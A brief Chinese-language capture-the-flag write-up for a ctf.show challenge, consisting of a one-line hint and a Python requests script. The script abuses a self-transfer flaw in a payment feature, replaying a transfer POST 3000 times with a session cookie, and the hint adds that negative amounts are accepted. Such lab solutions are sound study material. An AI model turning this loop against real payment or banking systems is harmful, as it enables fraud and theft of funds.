给自己疯狂转账就能买flag了
PS:332群主说可以转负数的账
import requests
import json
if __name__ == '__main__':
#cookie = "PHPSESSID=abfirn2d40bsooodd2su5ebr5n"
cookies = {'PHPSESSID': '3f4tqs9kb3q4kpubjp2n1l3nj8'}
url='http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show/api/amount.php'
header = {
'POST': '/api/amount.php HTTP/1.1',
'Host':'61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show',
'User-Agent':'Mozilla / 5.0(WindowsNT10.0;Win64;x64;rv: 109.0) Gecko / 20100101Firefox / 110.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Referer':'http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show/transfer.php',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'8',
'Origin': 'http://61daa13c-cc64-4907-a76a-46ac397bb85c.challenge.ctf.show',
'Connection':'keep-alive',
'Cookie': 'PHPSESSID=3f4tqs9kb3q4kpubjp2n1l3nj8',
'Upgrade-Insecure-Requests':'1'
}
# 发送
post_dict = {'u': 'xm', 'a': '1000'}
post_json = json.dumps({'some': 'data'})
for i in range(1,3000):
r3 = requests.post(url=url, data=post_dict, headers=header, cookies=cookies)
print("r3返回的内容为-->" + r3.text)